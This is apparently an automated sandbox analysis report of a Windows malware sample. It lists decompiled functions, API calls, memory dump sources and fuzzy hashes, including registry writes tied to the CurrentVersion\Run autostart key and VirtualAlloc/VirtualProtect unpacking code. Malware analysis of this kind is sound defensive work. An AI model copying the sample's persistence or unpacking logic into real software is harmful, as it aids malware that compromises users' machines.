                                                                    • RegCreateKeyExW.ADVAPI32(745D0770,00000000,00000000,00000000,00000000,02D235AB,00000000,?,?,?,?,02D235AB,?,02D2158B,80000001,?), ref: 02D210A0
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Open$CloseCreate
                                                                    • String ID:
                                                                    • API String ID: 1752019758-0
                                                                    • Opcode ID: 9f074ab36d17c505c845524ed06b95286cccbb6162304475eae3a4f3a9cde363
                                                                    • Instruction ID: 6a48252572c47ec3422c4b1b0ef687a1e1325c469c8817c9670707a8039245b6
                                                                    • Opcode Fuzzy Hash: 9f074ab36d17c505c845524ed06b95286cccbb6162304475eae3a4f3a9cde363
                                                                    • Instruction Fuzzy Hash: 1D01817120015DBFAB108E51ED80DBF3B6EEF54298B20402AFC0992310E731CD65DAB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406730 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCommandLineA.KERNEL32(004068C0,?), ref: 00406730
                                                                    • CoInitialize.OLE32(00000000), ref: 00406738
                                                                      • Part of subcall function 004053A0: VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040), ref: 0040540A
                                                                      • Part of subcall function 004053A0: VirtualProtect.KERNEL32(74707E90,00000100,00000040,?), ref: 0040542E
                                                                      • Part of subcall function 004053A0: MessageBoxA.USER32(00000000,00418940,00418940,00000001), ref: 0040548E
                                                                      • Part of subcall function 004053A0: MessageBoxA.USER32(00000000,00418940,00418940,00000001), ref: 004054AE
                                                                      • Part of subcall function 004053A0: MessageBoxA.USER32(00000000,00418940,00418940,00000002), ref: 004054D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Virtual$AllocCommandInitializeLineProtect
                                                                    • String ID:
                                                                    • API String ID: 4246773361-0
                                                                    • Opcode ID: 62298a183831b6cad95d734ce1ee692728ccb8486e96571fbe4ca2813af9f72b
                                                                    • Instruction ID: 760a1576de2ac2a99c9c8e5a98d66efc0fdce46a14bef97c55f5fc842ac0b789
                                                                    • Opcode Fuzzy Hash: 62298a183831b6cad95d734ce1ee692728ccb8486e96571fbe4ca2813af9f72b
                                                                    • Instruction Fuzzy Hash: CAA001351449089BD3592BB1AC0E7AD3A61AB29B46FA8847EBA26944A1CEB944018A19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21D0C Relevance: 3.0, APIs: 2, Instructions: 14sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D21D0C(signed int _a4) {

				Sleep(1); // executed
				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
			}



                                                                    0x02d21d11
                                                                    0x02d21d34

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CountSleepTick
                                                                    • String ID:
                                                                    • API String ID: 2804873075-0
                                                                    • Opcode ID: f18b814d472cd28fcc7666d736a8fbc9f5f45c73d054b8300b8b68a2a8176bde
                                                                    • Instruction ID: 91dbaad1d543491140b9538e3c8cc697fdc7cd8226c0d6c488109084e4343605
                                                                    • Opcode Fuzzy Hash: f18b814d472cd28fcc7666d736a8fbc9f5f45c73d054b8300b8b68a2a8176bde
                                                                    • Instruction Fuzzy Hash: B0D0A9307881048BE30D9A09F84A2223F4EE7E0305F04802AB90ED92D0C9A159744840
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20283 Relevance: 3.0, APIs: 2, Instructions: 8synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D20283(void** __ecx) {
				int _t2;
				void** _t4;

				_t4 = __ecx;
				ReleaseMutex( *__ecx);
				_t2 = FindCloseChangeNotification( *_t4); // executed
				return _t2;
			}





                                                                    0x02d20284
                                                                    0x02d20288
                                                                    0x02d20290
                                                                    0x02d20297

                                                                    APIs
                                                                    • ReleaseMutex.KERNEL32(?,?,02D1FEFD,02D2359A,02D15BEC,02D2359A,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 02D20288
                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 02D20290
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindMutexNotificationRelease
                                                                    • String ID:
                                                                    • API String ID: 4264517613-0
                                                                    • Opcode ID: 573d47cd8285ea5c13af76a88aeabd8627d477254ef7af5705da9e8d6d7a7491
                                                                    • Instruction ID: 660ce66ab00064962444986a3e79ae1ce00e1c392e46fc3f70c3919661c53ebd
                                                                    • Opcode Fuzzy Hash: 573d47cd8285ea5c13af76a88aeabd8627d477254ef7af5705da9e8d6d7a7491
                                                                    • Instruction Fuzzy Hash: 00B0923A845020DFEB362F55F80C894BFA5FF28251316586AF981912288BB20C389F80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15EFF Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D15EFF(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}




                                                                    0x02d15f09
                                                                    0x02d15f0f

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,?,02D12FA7,02D15A42,?,?,02D203FD,02D15A42,?,?,745D0770,00000000,?,02D15A42,00000000), ref: 02D15F02
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,02D203FD,02D15A42,?,?,745D0770,00000000,?,02D15A42,00000000), ref: 02D15F09
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateProcess
                                                                    • String ID:
                                                                    • API String ID: 1357844191-0
                                                                    • Opcode ID: 67e4ab19b74d8eb04e665cdcbb0b1d315ee599ae0da6f00daa72e8e4ad0f3080
                                                                    • Instruction ID: 7d45fb52930b79e23589a38108155afaebe7dc3f76867f798db282181e9ac1a8
                                                                    • Opcode Fuzzy Hash: 67e4ab19b74d8eb04e665cdcbb0b1d315ee599ae0da6f00daa72e8e4ad0f3080
                                                                    • Instruction Fuzzy Hash: 56A01270C80110ABEE5117E0DD0DF05371CA770302F024900B501D1140996008188731
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15EEE Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D15EEE(void* __ecx) {
				char _t2;

				_t2 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}




                                                                    0x02d15ef8
                                                                    0x02d15efe

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,?,02D13044,?,02D15C22,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EF1
                                                                    • RtlFreeHeap.NTDLL(00000000,?,?,02D236DB), ref: 02D15EF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 6f6ae20f11a04956b44ea883020b73e34331aa7df9584ba8281de133d57fe413
                                                                    • Instruction ID: 46ae47354f53e14ae75d0d5912e6c72fdedc1a13f9fb5107564a3c0d25982035
                                                                    • Opcode Fuzzy Hash: 6f6ae20f11a04956b44ea883020b73e34331aa7df9584ba8281de133d57fe413
                                                                    • Instruction Fuzzy Hash: CFA00271D95110ABED9557E09A0DB15372C9765702F114944B506D6240966458548631
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D11085 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D11085(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				return _t3;
			}




                                                                    0x02d11092
                                                                    0x02d11098

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateProcess
                                                                    • String ID:
                                                                    • API String ID: 1357844191-0
                                                                    • Opcode ID: 4c0cd8d587832773a9156e0dda64b3a57b4f1dd5c2c6dfeaf31de225bed5552f
                                                                    • Instruction ID: 3174dfcb3e6e25115ca46834b2d922ab0b61b6a9e024c53fad74c1ad77422e9c
                                                                    • Opcode Fuzzy Hash: 4c0cd8d587832773a9156e0dda64b3a57b4f1dd5c2c6dfeaf31de225bed5552f
                                                                    • Instruction Fuzzy Hash: 8DB01231C84210FBDF521BE0DE0CF093B28AB74703F024C00F605D1140C6314824DB22
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1309D Relevance: 2.6, APIs: 2, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E02D1309D(char** __ecx, void* __eflags, intOrPtr* _a4) {
				char** _v8;
				short* _t15;
				void* _t19;
				int _t39;

				_push(__ecx);
				_v8 = __ecx;
				 *_a4 = 0;
				if(E02D1308C(__ecx) > 0) {
					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E02D1308C(__ecx) + 2, 0, 0) + _t14;
					_t15 = E02D15E22(_t39);
					_t26 = _t15;
					E02D1308C(_v8);
					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
					_t19 = E02D135E5( &_v8, _t15); // executed
					E02D13437(_a4, _t19); // executed
					E02D15EA5(_v8);
					E02D15EA5(_t26);
				}
				return _a4;
			}







                                                                    0x02d130a0
                                                                    0x02d130aa
                                                                    0x02d130ad
                                                                    0x02d130b6
                                                                    0x02d130d2
                                                                    0x02d130d6
                                                                    0x02d130de
                                                                    0x02d130e0
                                                                    0x02d130f5
                                                                    0x02d130ff
                                                                    0x02d13108
                                                                    0x02d13110
                                                                    0x02d13117
                                                                    0x02d13117
                                                                    0x02d13122

                                                                    APIs
                                                                      • Part of subcall function 02D1308C: lstrlenA.KERNEL32(00000000,02D130B4,745D0770,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770,?,02D1350E,00000000,?,00000000), ref: 02D13093
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,745D0770,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770), ref: 02D130CA
                                                                      • Part of subcall function 02D15E22: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,02D133E2,?,02D15A4F,.bss,00000000), ref: 02D15E30
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770,?,02D1350E,00000000), ref: 02D130F5
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 4006399363-0
                                                                    • Opcode ID: 4638bdbfdd8d185994bed2a8a9152961c85a0f8616058ec3713d3e0b69e79237
                                                                    • Instruction ID: 27a00d2e220798d6f9bbceb886d557e8523fe589e9f384dd695748f0f7510647
                                                                    • Opcode Fuzzy Hash: 4638bdbfdd8d185994bed2a8a9152961c85a0f8616058ec3713d3e0b69e79237
                                                                    • Instruction Fuzzy Hash: 68017175B00124BBDB15EFA4EC81DDE7BAEDF49350F1005AAB501EB780CA74DE008BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00410F9B Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040DCE3: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0040DD24
                                                                    • _free.LIBCMT ref: 00411007
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 87e4df671e6ca6de64bab9c8e32b8bdadc3900401eb004a5244595f9560df5a9
                                                                    • Instruction ID: 4aa6a20bbacd2cf77519574be62369d4791a6c3b4af3f17c5a67f8cf68e88ed2
                                                                    • Opcode Fuzzy Hash: 87e4df671e6ca6de64bab9c8e32b8bdadc3900401eb004a5244595f9560df5a9
                                                                    • Instruction Fuzzy Hash: 49014E725003455BE3318F66CC41D9AFBD9FB89370F25062EF184972C0E6746885C778
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DCE3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0040DD24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 7b1dfb38bbe6a8d495ce9e40e5a244bb4395994149a342a225d366a952b8fbd7
                                                                    • Instruction ID: 5b9fca878553e3a062412a5a590bc346d3413588735a920c2132f9c12b98e610
                                                                    • Opcode Fuzzy Hash: 7b1dfb38bbe6a8d495ce9e40e5a244bb4395994149a342a225d366a952b8fbd7
                                                                    • Instruction Fuzzy Hash: 04F0E031E1512567DB215FE29D01B6F37589F82770B154037AC08B62C0CE3CD80986DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F481 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E02D1F481() {
				char _v8;
				void* __ecx;
				WCHAR* _t3;
				void* _t5;
				signed int* _t10;
				long _t15;
				signed int* _t16;
				intOrPtr* _t21;

				_push(_t10);
				_t16 = _t10;
				_t3 = E02D11085(0x7d0);
				 *_t16 =  *_t16 & 0x00000000;
				_t19 = _t3;
				 *_t21 = 0x3e8;
				GetModuleFileNameW(0, _t3, _t15);
				_t5 = E02D135E5( &_v8, _t19); // executed
				E02D13437(_t16, _t5); // executed
				E02D15EA5(_v8);
				E02D11099(_t19);
				return _t16;
			}











                                                                    0x02d1f484
                                                                    0x02d1f48c
                                                                    0x02d1f48e
                                                                    0x02d1f493
                                                                    0x02d1f496
                                                                    0x02d1f498
                                                                    0x02d1f4a2
                                                                    0x02d1f4ac
                                                                    0x02d1f4b4
                                                                    0x02d1f4bc
                                                                    0x02d1f4c2
                                                                    0x02d1f4cd

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,02D235AB,?,02D21618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 02D1F4A2
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D11099: GetProcessHeap.KERNEL32(00000000,00000000,02D21E18,00000000,00000000,00000000,00000000,.bss,00000000), ref: 02D1109F
                                                                      • Part of subcall function 02D11099: HeapFree.KERNEL32(00000000), ref: 02D110A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcesslstrcpylstrlen$AllocateFileModuleNameVirtual
                                                                    • String ID:
                                                                    • API String ID: 258861418-0
                                                                    • Opcode ID: d84d741bc4197a50ece013e436bfd5cde55d1750b629779f441324a02f1760e5
                                                                    • Instruction ID: 3a161efd668dec00d01e4f5f5d0f9efa74c2ad381571dbb656b8bd2ccac9702f
                                                                    • Opcode Fuzzy Hash: d84d741bc4197a50ece013e436bfd5cde55d1750b629779f441324a02f1760e5
                                                                    • Instruction Fuzzy Hash: A9E06D72A042547BD655B765FC15FAF7BAECFD1322F100069E109A6680EEA59E008AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F76B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E02D1F76B(WCHAR** __ecx, void* __edx, void* __eflags) {
				char _v524;
				WCHAR** _t13;
				void* _t14;

				_t14 = __edx;
				_t13 = __ecx;
				E02D11052( &_v524, 0, 0x208);
				__imp__SHGetSpecialFolderPathW(0,  &_v524, _t14, 0); // executed
				E02D135E5(_t13,  &_v524); // executed
				return _t13;
			}






                                                                    0x02d1f784
                                                                    0x02d1f786
                                                                    0x02d1f788
                                                                    0x02d1f79c
                                                                    0x02d1f7ab
                                                                    0x02d1f7b5

                                                                    APIs
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 02D1F79C
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$FolderPathSpeciallstrcpy
                                                                    • String ID:
                                                                    • API String ID: 1680175942-0
                                                                    • Opcode ID: 80d5f51eb2a601793c758b4e9606f64216645548f2d35760f499f7caaafa7086
                                                                    • Instruction ID: 4248df44ad107a0be1dbad2d1621124582ad4a6e50aef59fbe4842d2a11f7c1f
                                                                    • Opcode Fuzzy Hash: 80d5f51eb2a601793c758b4e9606f64216645548f2d35760f499f7caaafa7086
